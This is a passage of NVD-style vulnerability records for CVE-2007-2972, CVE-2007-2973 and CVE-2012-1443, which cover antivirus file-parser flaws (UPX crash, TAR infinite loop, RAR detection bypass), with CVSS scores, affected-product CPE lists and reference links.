                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
      },
      {
         lang: "es",
         value: "El motor de análisis sintáctico de ficheros del Avira Antivir Antivirus anterior al 7.04.00.24 permite a atacantes remotos provocar una denegación de servicio (caída de la aplicación) a través de un fichero comprimido UPX manipulado, lo que dispara un error de \"división por cero\".",
      },
   ],
   id: "CVE-2007-2972",
   lastModified: "2024-11-21T00:32:05.820",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36710",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securitytracker.com/id?1018132",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36710",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securitytracker.com/id?1018132",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity ?
Summary
Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.
References
cve@mitre.org | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
cve@mitre.org | http://osvdb.org/36711
cve@mitre.org | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
cve@mitre.org | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt
cve@mitre.org | http://www.securityfocus.com/archive/1/470042/100/0/threaded
cve@mitre.org | http://www.securityfocus.com/bid/24187
cve@mitre.org | http://www.securityfocus.com/bid/24239
cve@mitre.org | http://www.securitytracker.com/id?1018137
cve@mitre.org | http://www.vupen.com/english/advisories/2007/1971
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/34557
af854a3a-2127-422b-91ae-364da2661108 | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/36711
af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/470042/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24187
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24239
af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id?1018137
af854a3a-2127-422b-91ae-364da2661108 | http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/34557
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
      },
      {
         lang: "es",
         value: "El Antivirus Avira Antivir anterior al 7.03.00.09 permite a atacantes remotos provocar una denegación de servicio (bucle infinito y agotamiento de CPU) a través de un archivo TAR mal formado.",
      },
   ],
   evaluatorSolution: "This vulnerability is reportedly resolved in the following product version: 7.03.00.09",
   id: "CVE-2007-2973",
   lastModified: "2024-11-21T00:32:05.987",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36711",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/24239",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securitytracker.com/id?1018137",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36711",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/24239",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securitytracker.com/id?1018137",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:36
Severity ?
Summary
The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.
References
cve@mitre.org | http://osvdb.org/80454
cve@mitre.org | http://osvdb.org/80455
cve@mitre.org | http://osvdb.org/80456
cve@mitre.org | http://osvdb.org/80457
cve@mitre.org | http://osvdb.org/80458
cve@mitre.org | http://osvdb.org/80459
cve@mitre.org | http://osvdb.org/80460
cve@mitre.org | http://osvdb.org/80461
cve@mitre.org | http://osvdb.org/80467
cve@mitre.org | http://osvdb.org/80468
cve@mitre.org | http://osvdb.org/80469
cve@mitre.org | http://osvdb.org/80470
cve@mitre.org | http://osvdb.org/80471
cve@mitre.org | http://osvdb.org/80472
cve@mitre.org | http://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.org | http://www.securityfocus.com/archive/1/522005
cve@mitre.org | http://www.securityfocus.com/bid/52612
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80454
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80455
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80456
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80457
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80458
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80459
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80460
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80461
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80467
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80468
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80469
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80470
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80471
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80472
af854a3a-2127-422b-91ae-364da2661108 | http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/52612



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B91745E-EA83-4C70-BF2D-45A3678FA157",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C6590DF-9164-4A76-ADEE-9110C5E3588E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                     matchCriteriaId: "803A9A92-A984-43A8-8D27-C9A6FDB19A9D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB884937-53F0-4BB5-AA8F-1CCDCD1221D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                     matchCriteriaId: "D386C31F-6114-4A15-B0D5-15686D7EF8B8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "D95F8C32-D238-493F-A28D-8A588E8ADD13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "0912E21E-1EEB-4ADD-958F-F8AEBBF7C5E6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador de archivos RAR en ClamAV versión 0.96.4, Rising Antivirus versión 22.83.00.03, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, G Data AntiVirus versión 21, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Command Antivirus versión 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Emsisoft Anti-Malware versión 5.1.0.1, PC Tools AntiVirus versión 7.0.3.5, F-Prot Antivirus versión 4.6.2.117, VirusBuster versión 13.6.151.0, Fortinet  antivirus versión 4.2.254.0, Antiy Labs AVL SDK versión 2.0.3.7, K7 AntiVirus versión 9.77.3565, Trend Micro HouseCall versión 9.120.0.1004, Kaspersky Antivirus versión 7.0.0.125, Jiangmin Antivirus versión 13.0.900, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, Sophos Anti-Virus versión 4.61.0, NOD32 Antivirus versión 5795, Avira AntiVir versión 7.11.1.163, Norman Antivirus versión 6.06.12, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, Panda Antivirus versión 10.0.2.7, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Trend Micro AntiVirus versión 9.120.0.1004, Comodo Antivirus versión 7424, Bitdefender versión 7.2, eSafe versión 7.0.17.0, F-Secure Anti-Virus versión 9.0.16160.0, nProtect Versión antivirus 2011-01-17.01, AhnLab V3 Internet Security versión 2011.01.18.00, AVG Anti-Virus versión 10.0.0.1190, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, y VBA32 versión 3.12.14.2, permite a los atacantes remotos asistidos por el usuario omitir la detección de malware por medio de un archivo RAR con una inicial Secuencia de caracteres MZ. NOTA: esto puede ser más tarde SPLIT en varios CVE si se publica información adicional que muestra que el error se produjo de manera independiente en diferentes implementaciones de analizador RAR.",
      },
   ],
   id: "CVE-2012-1443",
   lastModified: "2024-11-21T01:36:59.753",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:48.083",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80454",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80455",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80456",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80457",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80458",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80459",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80460",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80461",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80467",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80468",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80469",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80470",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80471",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80472",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52612",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80454",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80455",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80456",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80457",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80458",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80459",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80460",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80461",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80467",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80468",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80469",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80470",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80471",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80472",
